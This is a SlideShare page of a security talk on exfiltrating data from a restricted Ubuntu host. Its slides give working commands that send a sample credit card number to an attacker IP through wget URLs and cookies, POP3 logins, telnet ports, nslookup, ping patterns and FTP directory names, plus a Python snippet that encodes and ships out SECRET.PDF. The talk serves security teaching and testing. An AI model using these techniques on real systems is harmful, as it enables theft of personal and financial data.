SlideShare a Scribd company logo
Goodbye	Data,	Hello	Exfiltration
Itzik Kotler
CTO	&	Co-Founder	of	SafeBreach
Exfiltration	is	the	New	Infiltration
• The	Identify	Theft	Resource	Center	(ITRC)	reports	that	between	2005	
– 2016	a	total	of	847,807,830 records	exposed	due	to	data	breach	
incidents
• There’s	no	question	IF a	company	will	get	breached,	only	when	and	
what	will	be	the	outcome
• Getting	in	is	promised,	but	is	getting	to	the	ASSET and	EXFILTRATING	
it	is	given?	No	…
Get	into	the	Mindset	…
Rules	of	Engagement
• Ubuntu	14.04.3	(Server)	LTS	Vanilla	Installation
• Standard	User	Account	(No	Root/Administrator	Privileges)
• No	compilers	(C,	C++	etc.)	or	Interpreters	(Python,	Ruby	etc.)
• Read-only	Filesystem
Choose	Your	Destiny:	Assets
• Social	Security	Number	(SSN)
• Credit	Cards	(CC)
• Medical	Records	(PHI)
• Personal	Records	(PII)
• ...
TCP
HTTP	GET:	Exfiltration	via	URL
• wget is a	free	software	package	for	retrieving	files	using	HTTP,	HTTPS	
and	FTP.	It	accepts	*any*	URL	as	a	parameter.	
• We	can	use	abuse	wget’s URL	parameter	to	embedded	our	data	in	it.	
• It’s	simple	 and	straightforward,	but	works	like	a	charm	:-)
$ wget http://192.168.1.88/4716846291594680
HTTP	GET	#2:	Exfiltration	via	Cookie
• wget also	allow	us	to	specify	our	own	HTTP	HEADERS
• We	can	abuse	wget’s header	feature	to	spoof	a	Cookie	(e.g.	JSESSIONID)	
and	embedded	our	data	as	it’s	value
• We	can	spoof	other	common	fields	such	as:	User-Agent,	Accept,	and	If-
None-Match	to	name	a	few
$ wget --header="Cookie: JSESSIONID=4716846291594680"
http://192.168.1.88
POP3:	Exfiltration	via	Authentication
$ telnet 192.168.1.88 110
Trying 192.168.1.88...
Connected to 192.168.1.88.
Escape character is '^]'.
+OK POP3 service
USER foobar
+OK password required for user foobar
PASS 4716846291594680
-ERR [AUTH] Authentication failed
How	It	Works?
• telnet	client	is	a	free	software	used	for	opening	an	interactive	
communication	with	*any*	host	on	*any*	TCP	port	
• POP3	is	a	text-based	protocol	used	for receiving	emails,	it	requires	
authentication	before	allowing	access	to	a	mailbox.	
• We	can	abuse	the	authentication	mechanism	(not	specific	to	POP3)	
and	use	the	USERNAME	and/or	PASSWORD	value(s)	as	a	way	to	
exfiltrate the	data
TCP:	Exfiltration	via	SYN	(Destination	Port)
$ telnet 192.168.1.88 4716 ; telnet 192.168.1.88 8462 ; telnet
192.168.1.88 9159 ; telnet 192.168.1.88 4680
Trying 192.168.1.88...
telnet: Unable to connect to remote host: Connection refused
Trying 192.168.1.88...
telnet: Unable to connect to remote host: Connection refused
Trying 192.168.1.88...
telnet: Unable to connect to remote host: Connection refused
Trying 192.168.1.88...
telnet: Unable to connect to remote host: Connection refused
How	It	Works?
• The	telnet	client	takes	host	and	TCP	port	as	parameter.	It	will	then	
proceed	to	open	TCP	connection	to	the	given	host	at	the	given	port.	
• We	can	abuse	telnet’s	TCP	port	parameter	to	embedded	our	data	in	
it.	This	means	we	control	a	16-bit	field	in	a	SYN	packet	that	will	be	
sent	to	*any*	destination	we	want
• By	splitting	the	asset	(i.e.	4716846291594680)	 to	groups	of	4	digits	
(e.g.	4716 ,	8462,	9159	etc.)	we	make	sure	each	port	falls	within	the	
range	of	a	valid	TCP	port	(216).
UDP
DNS:	Exfiltration	via	Query	(Custom	Server)
• nslookup is	a	free	software	for	querying	DNS	servers.	It	accepts	an	optional	
argument	of	DNS	server	to	connect	to	for	the	query
• We	can	abuse	the	optional	DNS	server	argument	to	connect	to	our	own	
server	and	use	the	name	parameter	as	way	to	embedded	our	data	in	the	
request
• Again,	simple	and	straightforward	-- but	works	like	a	charm	:-)
$ nslookup www.4716846291594680.com 192.168.1.88
DNS:	Exfiltration	via	Query	(Controlled	NS)
• When	you	own	a	domain,	you	get	to	decide	the	NS	(Nameserver)	will	be	
used	to	deliver	it.
• We	can	use	abuse	the	way	that	the	DNS	protocol	works	to	get	a	hit	on	our	
NS	server	and	have	the	data	embedded	in	the	hit	(Query).
• It’s	simple	and	straightforward,	but	costly	;-)
$ nslookup 4716846291594680.safebreach.com
Other	UDP	Applications
• ntpdate (123/udp)	-- set	the	date	and	time	via	NTP
• dhclient (68/udp)	-- Dynamic	Host	Configuration	Protocol	Client
ICMP
ICMP:	ECHO	REQUEST	(aka.	Ping)
• wget is a	free	software	package	for	retrieving	files	using	HTTP,	HTTPS	and	
FTP.	It	accepts	*any*	URL	as	a	parameter.	
• We	can	use	abuse	ping’s	pattern	feature	to	embedded	our	data	in	the	ICMP	
ECHO_REQUEST	packet.
• It’s	simple	and	straightforward,	but	works	like	a	charm	:-)
$ ping -p 4716846291594680 192.168.1.88
Asset	Change
• So	far	our	asset	was	a	alphanumeric	String,	but	what	if	it	was	Binary?	
This	means	we	need	Encoding
• So	far	our	asset	was	relatively	small,	but	what	if	it	was	a	file	like	a	PDF,	
XLS,	TIFF	etc.?	This	means	we	need	to	Split	it
• For	these	cases,	let’s	bend	the	rules	a	little	bit	and	use	Python	
(Python	2.7.6	comes	preinstalled	on	our	Ubuntu;	so	we’re	not	
violating	our	Read-only	Filesystem rule!)
Encoding	with	Python
$ python
>>> # SECRET.PDF Encoded in Hex
>>> hex_encoded_asset = open(‘SECRET.PDF’).read().encode(‘hex’)
>>> # SECRET.PDF Encoded in Base64
>>> b64_encoded_asset = open(‘SECRET.PDF’).read().encode(‘base64’)
>>> # Applying ROT13 on the Base64 Encoded Asset
>>> b64_encoded_rot13_asset = b64_encoded_asset.encode(‘rot13’)
Splitting	with	Python
$ python
>>> # We’ll use SECRET.PDF Encoded in Hex as a Sample Asset
>>> hex_encoded_asset = open(‘SECRET.PDF’).read().encode(‘hex’)
>>> # Split by 16 bits (i.e. WORD Size)
>>> import re
>>> word_size_splitted = re.findall('..?', hex_encoded_asset)
>>> # Split by 0xFF (i.e. Delimiter)
>>> ff_splitted = hex_encoded_asset.split(‘ff’)
End	Game:	MKDIR’ing an	Asset	over	FTP
$ python
>>> import re
>>> import ftplib
>>> ftp = ftplib.FTP(‘192.168.1.88', ‘ftp', ‘ftp')
>>> data = open(‘SECRET.PDF’).read().encode('hex')
>>> for dir_name in re.findall('.?.?.?.?.?.?.?.', data):
... i = locals().get('i', 0) + 1
... ftp.mkd('%s_%s' % (i, dir_name))
>>>
Let’s	Get	Physical	…
Changing	the	Rules	[For	The	Last	Time!]
• Exfiltration	is	not	a	Network	problem,	there	are	other	ways	to	extract	
data	from	a	Computer.	USB	and	Thunderbolt	are	too	obvious!
• For	this	one	we’ll	need	to	bend	the	Read-only	Filesystem to	
download	a	Python	script	(no	other	dependencies	are	required!)	
• It's	time	to	face	the	music	:-)
DEMO
$ git clone https://github.com/iiamit/data-sound-poc
$ cd data-sound-poc/
$ python data2sound.py –i message.txt -o foobar.wav
How	It	Works?
• Modulation:	
• We	modulate	the	data	on	one	hand,	and	demodulate	it	in	the	other.	
• This	is	how	old-school	Modem	(modulator-demodulator)	are	working
• There’s	no	Layer	1	(e.g.	V.42)	or	Layer	2	(HDLC,	SLIP,	PPP,	etc.)	so	
there’s	both	limited	functionality	and	bandwidth.	In	other	words,	not	
effective	for	big	files.
• Any	3.5mm	jack	can	be	used	to	output	the	data	from	almost	any	
Computer	with	Headphones	support.
In	life,	questions	are	guaranteed;	Answers	aren't …
Twitter:	@itzikkotler /	Email:	itzik@safebreach.com
Thank You!
Twitter:	@itzikkotler /	Email:	itzik@safebreach.com

More Related Content

What's hot

IPSec | Computer Network
IPSec | Computer NetworkIPSec | Computer Network
IPSec | Computer Network
shubham ghimire
 
Overview of ip_security by JetArvind kumar Madhukar
Overview of ip_security by JetArvind kumar Madhukar Overview of ip_security by JetArvind kumar Madhukar
Overview of ip_security by JetArvind kumar Madhukar
ALLCAD Services Pvt Limited
 
Nat pat
Nat patNat pat
IPSec Overview
IPSec OverviewIPSec Overview
IPSec Overview
davisli
 
Ipsecurity
IpsecurityIpsecurity
Ipsecurity
Chinmay Patel
 
IP Security
IP SecurityIP Security
IP Security
sahilshah200
 
Ip sec and ssl
Ip sec and  sslIp sec and  ssl
Ip sec and sslMohd Arif
 
IPSec VPN & IPSec Protocols
IPSec VPN & IPSec ProtocolsIPSec VPN & IPSec Protocols
IPSec VPN & IPSec Protocols
NetProtocol Xpert
 
IP Sec by Amin Pathan
IP Sec by Amin PathanIP Sec by Amin Pathan
IP Sec by Amin Pathanaminpathan11
 
Ipsec 2
Ipsec 2Ipsec 2
Ipsec 2
Sourabh Badve
 
IPsec for IMS
IPsec for IMSIPsec for IMS
IPsec for IMS
Hossein Yavari
 
IPsec with AH
IPsec with AHIPsec with AH
IPsec with AH
jtlevesque
 
Ipsec
IpsecIpsec
IPSec VPN tunnel
IPSec VPN tunnelIPSec VPN tunnel
IPSec VPN tunnel
ArunKumar Subbiah
 
Types of VPN
Types of VPNTypes of VPN
Types of VPN
NetProtocol Xpert
 

What's hot (18)

IPSec | Computer Network
IPSec | Computer NetworkIPSec | Computer Network
IPSec | Computer Network
 
Overview of ip_security by JetArvind kumar Madhukar
Overview of ip_security by JetArvind kumar Madhukar Overview of ip_security by JetArvind kumar Madhukar
Overview of ip_security by JetArvind kumar Madhukar
 
Nat pat
Nat patNat pat
Nat pat
 
IPSec Overview
IPSec OverviewIPSec Overview
IPSec Overview
 
Ipsecurity
IpsecurityIpsecurity
Ipsecurity
 
IP Security
IP SecurityIP Security
IP Security
 
Ip sec and ssl
Ip sec and  sslIp sec and  ssl
Ip sec and ssl
 
IP Security
IP SecurityIP Security
IP Security
 
IPSec VPN & IPSec Protocols
IPSec VPN & IPSec ProtocolsIPSec VPN & IPSec Protocols
IPSec VPN & IPSec Protocols
 
IP Sec by Amin Pathan
IP Sec by Amin PathanIP Sec by Amin Pathan
IP Sec by Amin Pathan
 
I psec
I psecI psec
I psec
 
Ipsec 2
Ipsec 2Ipsec 2
Ipsec 2
 
IPsec for IMS
IPsec for IMSIPsec for IMS
IPsec for IMS
 
IPsec with AH
IPsec with AHIPsec with AH
IPsec with AH
 
IPsec
IPsecIPsec
IPsec
 
Ipsec
IpsecIpsec
Ipsec
 
IPSec VPN tunnel
IPSec VPN tunnelIPSec VPN tunnel
IPSec VPN tunnel
 
Types of VPN
Types of VPNTypes of VPN
Types of VPN
 

Similar to Goodbye Data, Hello Exfiltration

BKK16-110 A Gentle Introduction to Trusted Execution and OP-TEE
BKK16-110 A Gentle Introduction to Trusted Execution and OP-TEEBKK16-110 A Gentle Introduction to Trusted Execution and OP-TEE
BKK16-110 A Gentle Introduction to Trusted Execution and OP-TEE
Linaro
 
Unleashing End-to_end TLS Security Leveraging NGINX with Intel(r) QuickAssist...
Unleashing End-to_end TLS Security Leveraging NGINX with Intel(r) QuickAssist...Unleashing End-to_end TLS Security Leveraging NGINX with Intel(r) QuickAssist...
Unleashing End-to_end TLS Security Leveraging NGINX with Intel(r) QuickAssist...
Michelle Holley
 
Leveraging Apache Spark and Delta Lake for Efficient Data Encryption at Scale
Leveraging Apache Spark and Delta Lake for Efficient Data Encryption at ScaleLeveraging Apache Spark and Delta Lake for Efficient Data Encryption at Scale
Leveraging Apache Spark and Delta Lake for Efficient Data Encryption at Scale
Databricks
 
HIS 2017 Roderick chapman- Secure Updates for Embedded Systems
HIS 2017 Roderick chapman- Secure Updates for Embedded SystemsHIS 2017 Roderick chapman- Secure Updates for Embedded Systems
HIS 2017 Roderick chapman- Secure Updates for Embedded Systems
jamieayre
 
Federated Identity for IoT with OAuth2
Federated Identity for IoT with OAuth2Federated Identity for IoT with OAuth2
Federated Identity for IoT with OAuth2
Paul Fremantle
 
Systems Administration
Systems AdministrationSystems Administration
Systems Administration
Mark John Lado, MIT
 
Week13
Week13Week13
Week13
s1180110
 
ICMP
ICMP ICMP
Suricata: A Decade Under the Influence (of packet sniffing)
Suricata: A Decade Under the Influence (of packet sniffing)Suricata: A Decade Under the Influence (of packet sniffing)
Suricata: A Decade Under the Influence (of packet sniffing)
Jason Williams
 
Search and analyze data in real time
Search and analyze data in real timeSearch and analyze data in real time
Search and analyze data in real time
Rohit Kalsarpe
 
Solnik secure enclaveprocessor-pacsec
Solnik secure enclaveprocessor-pacsecSolnik secure enclaveprocessor-pacsec
Solnik secure enclaveprocessor-pacsec
PacSecJP
 
Internet protocol
Internet protocol Internet protocol
Internet protocol
Bint Javed
 
CPP17 - File IO
CPP17 - File IOCPP17 - File IO
CPP17 - File IO
Michael Heron
 
intilop.pdf
intilop.pdfintilop.pdf
Cyber forensics
Cyber forensicsCyber forensics
Cyber forensics
Gopal Karthik
 
FIPS 140-2 Validations in a Secure Enclave
FIPS 140-2 Validations in a Secure EnclaveFIPS 140-2 Validations in a Secure Enclave
FIPS 140-2 Validations in a Secure Enclave
wolfSSL
 
SYBSC IT SEM IV EMBEDDED SYSTEMS UNIT IV Designing Embedded System with 8051...
SYBSC IT SEM IV EMBEDDED SYSTEMS UNIT IV  Designing Embedded System with 8051...SYBSC IT SEM IV EMBEDDED SYSTEMS UNIT IV  Designing Embedded System with 8051...
SYBSC IT SEM IV EMBEDDED SYSTEMS UNIT IV Designing Embedded System with 8051...
Arti Parab Academics
 
Best Practices for Design Hardware APIs
Best Practices for Design Hardware APIsBest Practices for Design Hardware APIs
Best Practices for Design Hardware APIs
Matt Haines
 
What is Subnet Mask.pptx
What is Subnet Mask.pptxWhat is Subnet Mask.pptx
What is Subnet Mask.pptx
Vignesh kumar
 
System analyst
System analystSystem analyst
System analyst
returnasap
 

Similar to Goodbye Data, Hello Exfiltration (20)

BKK16-110 A Gentle Introduction to Trusted Execution and OP-TEE
BKK16-110 A Gentle Introduction to Trusted Execution and OP-TEEBKK16-110 A Gentle Introduction to Trusted Execution and OP-TEE
BKK16-110 A Gentle Introduction to Trusted Execution and OP-TEE
 
Unleashing End-to_end TLS Security Leveraging NGINX with Intel(r) QuickAssist...
Unleashing End-to_end TLS Security Leveraging NGINX with Intel(r) QuickAssist...Unleashing End-to_end TLS Security Leveraging NGINX with Intel(r) QuickAssist...
Unleashing End-to_end TLS Security Leveraging NGINX with Intel(r) QuickAssist...
 
Leveraging Apache Spark and Delta Lake for Efficient Data Encryption at Scale
Leveraging Apache Spark and Delta Lake for Efficient Data Encryption at ScaleLeveraging Apache Spark and Delta Lake for Efficient Data Encryption at Scale
Leveraging Apache Spark and Delta Lake for Efficient Data Encryption at Scale
 
HIS 2017 Roderick chapman- Secure Updates for Embedded Systems
HIS 2017 Roderick chapman- Secure Updates for Embedded SystemsHIS 2017 Roderick chapman- Secure Updates for Embedded Systems
HIS 2017 Roderick chapman- Secure Updates for Embedded Systems
 
Federated Identity for IoT with OAuth2
Federated Identity for IoT with OAuth2Federated Identity for IoT with OAuth2
Federated Identity for IoT with OAuth2
 
Systems Administration
Systems AdministrationSystems Administration
Systems Administration
 
Week13
Week13Week13
Week13
 
ICMP
ICMP ICMP
ICMP
 
Suricata: A Decade Under the Influence (of packet sniffing)
Suricata: A Decade Under the Influence (of packet sniffing)Suricata: A Decade Under the Influence (of packet sniffing)
Suricata: A Decade Under the Influence (of packet sniffing)
 
Search and analyze data in real time
Search and analyze data in real timeSearch and analyze data in real time
Search and analyze data in real time
 
Solnik secure enclaveprocessor-pacsec
Solnik secure enclaveprocessor-pacsecSolnik secure enclaveprocessor-pacsec
Solnik secure enclaveprocessor-pacsec
 
Internet protocol
Internet protocol Internet protocol
Internet protocol
 
CPP17 - File IO
CPP17 - File IOCPP17 - File IO
CPP17 - File IO
 
intilop.pdf
intilop.pdfintilop.pdf
intilop.pdf
 
Cyber forensics
Cyber forensicsCyber forensics
Cyber forensics
 
FIPS 140-2 Validations in a Secure Enclave
FIPS 140-2 Validations in a Secure EnclaveFIPS 140-2 Validations in a Secure Enclave
FIPS 140-2 Validations in a Secure Enclave
 
SYBSC IT SEM IV EMBEDDED SYSTEMS UNIT IV Designing Embedded System with 8051...
SYBSC IT SEM IV EMBEDDED SYSTEMS UNIT IV  Designing Embedded System with 8051...SYBSC IT SEM IV EMBEDDED SYSTEMS UNIT IV  Designing Embedded System with 8051...
SYBSC IT SEM IV EMBEDDED SYSTEMS UNIT IV Designing Embedded System with 8051...
 
Best Practices for Design Hardware APIs
Best Practices for Design Hardware APIsBest Practices for Design Hardware APIs
Best Practices for Design Hardware APIs
 
What is Subnet Mask.pptx
What is Subnet Mask.pptxWhat is Subnet Mask.pptx
What is Subnet Mask.pptx
 
System analyst
System analystSystem analyst
System analyst
 

More from Itzik Kotler

In Plain Sight: The Perfect Exfiltration
In Plain Sight: The Perfect ExfiltrationIn Plain Sight: The Perfect Exfiltration
In Plain Sight: The Perfect Exfiltration
Itzik Kotler
 
Hack Like It's 2013 (The Workshop)
Hack Like It's 2013 (The Workshop)Hack Like It's 2013 (The Workshop)
Hack Like It's 2013 (The Workshop)
Itzik Kotler
 
Sounds Like Botnet
Sounds Like BotnetSounds Like Botnet
Sounds Like Botnet
Itzik Kotler
 
Turbot - A Next Generation Botnet
Turbot - A Next Generation BotnetTurbot - A Next Generation Botnet
Turbot - A Next Generation Botnet
Itzik Kotler
 
The Day of the Updates
The Day of the UpdatesThe Day of the Updates
The Day of the Updates
Itzik Kotler
 
Jinx - Malware 2.0
Jinx - Malware 2.0Jinx - Malware 2.0
Jinx - Malware 2.0
Itzik Kotler
 

More from Itzik Kotler (6)

In Plain Sight: The Perfect Exfiltration
In Plain Sight: The Perfect ExfiltrationIn Plain Sight: The Perfect Exfiltration
In Plain Sight: The Perfect Exfiltration
 
Hack Like It's 2013 (The Workshop)
Hack Like It's 2013 (The Workshop)Hack Like It's 2013 (The Workshop)
Hack Like It's 2013 (The Workshop)
 
Sounds Like Botnet
Sounds Like BotnetSounds Like Botnet
Sounds Like Botnet
 
Turbot - A Next Generation Botnet
Turbot - A Next Generation BotnetTurbot - A Next Generation Botnet
Turbot - A Next Generation Botnet
 
The Day of the Updates
The Day of the UpdatesThe Day of the Updates
The Day of the Updates
 
Jinx - Malware 2.0
Jinx - Malware 2.0Jinx - Malware 2.0
Jinx - Malware 2.0
 

Recently uploaded

Enhancing Research Orchestration Capabilities at ORNL.pdf
Enhancing Research Orchestration Capabilities at ORNL.pdfEnhancing Research Orchestration Capabilities at ORNL.pdf
Enhancing Research Orchestration Capabilities at ORNL.pdf
Globus
 
Orion Context Broker introduction 20240604
Orion Context Broker introduction 20240604Orion Context Broker introduction 20240604
Orion Context Broker introduction 20240604
Fermin Galan
 
Lecture 1 Introduction to games development
Lecture 1 Introduction to games developmentLecture 1 Introduction to games development
Lecture 1 Introduction to games development
abdulrafaychaudhry
 
Accelerate Enterprise Software Engineering with Platformless
Accelerate Enterprise Software Engineering with PlatformlessAccelerate Enterprise Software Engineering with Platformless
Accelerate Enterprise Software Engineering with Platformless
WSO2
 
Field Employee Tracking System| MiTrack App| Best Employee Tracking Solution|...
Field Employee Tracking System| MiTrack App| Best Employee Tracking Solution|...Field Employee Tracking System| MiTrack App| Best Employee Tracking Solution|...
Field Employee Tracking System| MiTrack App| Best Employee Tracking Solution|...
informapgpstrackings
 
Navigating the Metaverse: A Journey into Virtual Evolution"
Navigating the Metaverse: A Journey into Virtual Evolution"Navigating the Metaverse: A Journey into Virtual Evolution"
Navigating the Metaverse: A Journey into Virtual Evolution"
Donna Lenk
 
Webinar: Salesforce Document Management 2.0 - Smarter, Faster, Better
Webinar: Salesforce Document Management 2.0 - Smarter, Faster, BetterWebinar: Salesforce Document Management 2.0 - Smarter, Faster, Better
Webinar: Salesforce Document Management 2.0 - Smarter, Faster, Better
XfilesPro
 
Dominate Social Media with TubeTrivia AI’s Addictive Quiz Videos.pdf
Dominate Social Media with TubeTrivia AI’s Addictive Quiz Videos.pdfDominate Social Media with TubeTrivia AI’s Addictive Quiz Videos.pdf
Dominate Social Media with TubeTrivia AI’s Addictive Quiz Videos.pdf
AMB-Review
 
Globus Compute wth IRI Workflows - GlobusWorld 2024
Globus Compute wth IRI Workflows - GlobusWorld 2024Globus Compute wth IRI Workflows - GlobusWorld 2024
Globus Compute wth IRI Workflows - GlobusWorld 2024
Globus
 
RISE with SAP and Journey to the Intelligent Enterprise
RISE with SAP and Journey to the Intelligent EnterpriseRISE with SAP and Journey to the Intelligent Enterprise
RISE with SAP and Journey to the Intelligent Enterprise
Srikant77
 
A Sighting of filterA in Typelevel Rite of Passage
A Sighting of filterA in Typelevel Rite of PassageA Sighting of filterA in Typelevel Rite of Passage
A Sighting of filterA in Typelevel Rite of Passage
Philip Schwarz
 
Into the Box 2024 - Keynote Day 2 Slides.pdf
Into the Box 2024 - Keynote Day 2 Slides.pdfInto the Box 2024 - Keynote Day 2 Slides.pdf
Into the Box 2024 - Keynote Day 2 Slides.pdf
Ortus Solutions, Corp
 
Cyaniclab : Software Development Agency Portfolio.pdf
Cyaniclab : Software Development Agency Portfolio.pdfCyaniclab : Software Development Agency Portfolio.pdf
Cyaniclab : Software Development Agency Portfolio.pdf
Cyanic lab
 
Globus Connect Server Deep Dive - GlobusWorld 2024
Globus Connect Server Deep Dive - GlobusWorld 2024Globus Connect Server Deep Dive - GlobusWorld 2024
Globus Connect Server Deep Dive - GlobusWorld 2024
Globus
 
In 2015, I used to write extensions for Joomla, WordPress, phpBB3, etc and I ...
In 2015, I used to write extensions for Joomla, WordPress, phpBB3, etc and I ...In 2015, I used to write extensions for Joomla, WordPress, phpBB3, etc and I ...
In 2015, I used to write extensions for Joomla, WordPress, phpBB3, etc and I ...
Juraj Vysvader
 
Providing Globus Services to Users of JASMIN for Environmental Data Analysis
Providing Globus Services to Users of JASMIN for Environmental Data AnalysisProviding Globus Services to Users of JASMIN for Environmental Data Analysis
Providing Globus Services to Users of JASMIN for Environmental Data Analysis
Globus
 
AI Pilot Review: The World’s First Virtual Assistant Marketing Suite
AI Pilot Review: The World’s First Virtual Assistant Marketing SuiteAI Pilot Review: The World’s First Virtual Assistant Marketing Suite
AI Pilot Review: The World’s First Virtual Assistant Marketing Suite
Google
 
How to Position Your Globus Data Portal for Success Ten Good Practices
How to Position Your Globus Data Portal for Success Ten Good PracticesHow to Position Your Globus Data Portal for Success Ten Good Practices
How to Position Your Globus Data Portal for Success Ten Good Practices
Globus
 
Graphic Design Crash Course for beginners
Graphic Design Crash Course for beginnersGraphic Design Crash Course for beginners
Graphic Design Crash Course for beginners
e20449
 
A Comprehensive Look at Generative AI in Retail App Testing.pdf
A Comprehensive Look at Generative AI in Retail App Testing.pdfA Comprehensive Look at Generative AI in Retail App Testing.pdf
A Comprehensive Look at Generative AI in Retail App Testing.pdf
kalichargn70th171
 

Recently uploaded (20)

Enhancing Research Orchestration Capabilities at ORNL.pdf
Enhancing Research Orchestration Capabilities at ORNL.pdfEnhancing Research Orchestration Capabilities at ORNL.pdf
Enhancing Research Orchestration Capabilities at ORNL.pdf
 
Orion Context Broker introduction 20240604
Orion Context Broker introduction 20240604Orion Context Broker introduction 20240604
Orion Context Broker introduction 20240604
 
Lecture 1 Introduction to games development
Lecture 1 Introduction to games developmentLecture 1 Introduction to games development
Lecture 1 Introduction to games development
 
Accelerate Enterprise Software Engineering with Platformless
Accelerate Enterprise Software Engineering with PlatformlessAccelerate Enterprise Software Engineering with Platformless
Accelerate Enterprise Software Engineering with Platformless
 
Field Employee Tracking System| MiTrack App| Best Employee Tracking Solution|...
Field Employee Tracking System| MiTrack App| Best Employee Tracking Solution|...Field Employee Tracking System| MiTrack App| Best Employee Tracking Solution|...
Field Employee Tracking System| MiTrack App| Best Employee Tracking Solution|...
 
Navigating the Metaverse: A Journey into Virtual Evolution"
Navigating the Metaverse: A Journey into Virtual Evolution"Navigating the Metaverse: A Journey into Virtual Evolution"
Navigating the Metaverse: A Journey into Virtual Evolution"
 
Webinar: Salesforce Document Management 2.0 - Smarter, Faster, Better
Webinar: Salesforce Document Management 2.0 - Smarter, Faster, BetterWebinar: Salesforce Document Management 2.0 - Smarter, Faster, Better
Webinar: Salesforce Document Management 2.0 - Smarter, Faster, Better
 
Dominate Social Media with TubeTrivia AI’s Addictive Quiz Videos.pdf
Dominate Social Media with TubeTrivia AI’s Addictive Quiz Videos.pdfDominate Social Media with TubeTrivia AI’s Addictive Quiz Videos.pdf
Dominate Social Media with TubeTrivia AI’s Addictive Quiz Videos.pdf
 
Globus Compute wth IRI Workflows - GlobusWorld 2024
Globus Compute wth IRI Workflows - GlobusWorld 2024Globus Compute wth IRI Workflows - GlobusWorld 2024
Globus Compute wth IRI Workflows - GlobusWorld 2024
 
RISE with SAP and Journey to the Intelligent Enterprise
RISE with SAP and Journey to the Intelligent EnterpriseRISE with SAP and Journey to the Intelligent Enterprise
RISE with SAP and Journey to the Intelligent Enterprise
 
A Sighting of filterA in Typelevel Rite of Passage
A Sighting of filterA in Typelevel Rite of PassageA Sighting of filterA in Typelevel Rite of Passage
A Sighting of filterA in Typelevel Rite of Passage
 
Into the Box 2024 - Keynote Day 2 Slides.pdf
Into the Box 2024 - Keynote Day 2 Slides.pdfInto the Box 2024 - Keynote Day 2 Slides.pdf
Into the Box 2024 - Keynote Day 2 Slides.pdf
 
Cyaniclab : Software Development Agency Portfolio.pdf
Cyaniclab : Software Development Agency Portfolio.pdfCyaniclab : Software Development Agency Portfolio.pdf
Cyaniclab : Software Development Agency Portfolio.pdf
 
Globus Connect Server Deep Dive - GlobusWorld 2024
Globus Connect Server Deep Dive - GlobusWorld 2024Globus Connect Server Deep Dive - GlobusWorld 2024
Globus Connect Server Deep Dive - GlobusWorld 2024
 
In 2015, I used to write extensions for Joomla, WordPress, phpBB3, etc and I ...
In 2015, I used to write extensions for Joomla, WordPress, phpBB3, etc and I ...In 2015, I used to write extensions for Joomla, WordPress, phpBB3, etc and I ...
In 2015, I used to write extensions for Joomla, WordPress, phpBB3, etc and I ...
 
Providing Globus Services to Users of JASMIN for Environmental Data Analysis
Providing Globus Services to Users of JASMIN for Environmental Data AnalysisProviding Globus Services to Users of JASMIN for Environmental Data Analysis
Providing Globus Services to Users of JASMIN for Environmental Data Analysis
 
AI Pilot Review: The World’s First Virtual Assistant Marketing Suite
AI Pilot Review: The World’s First Virtual Assistant Marketing SuiteAI Pilot Review: The World’s First Virtual Assistant Marketing Suite
AI Pilot Review: The World’s First Virtual Assistant Marketing Suite
 
How to Position Your Globus Data Portal for Success Ten Good Practices
How to Position Your Globus Data Portal for Success Ten Good PracticesHow to Position Your Globus Data Portal for Success Ten Good Practices
How to Position Your Globus Data Portal for Success Ten Good Practices
 
Graphic Design Crash Course for beginners
Graphic Design Crash Course for beginnersGraphic Design Crash Course for beginners
Graphic Design Crash Course for beginners
 
A Comprehensive Look at Generative AI in Retail App Testing.pdf
A Comprehensive Look at Generative AI in Retail App Testing.pdfA Comprehensive Look at Generative AI in Retail App Testing.pdf
A Comprehensive Look at Generative AI in Retail App Testing.pdf
 

Goodbye Data, Hello Exfiltration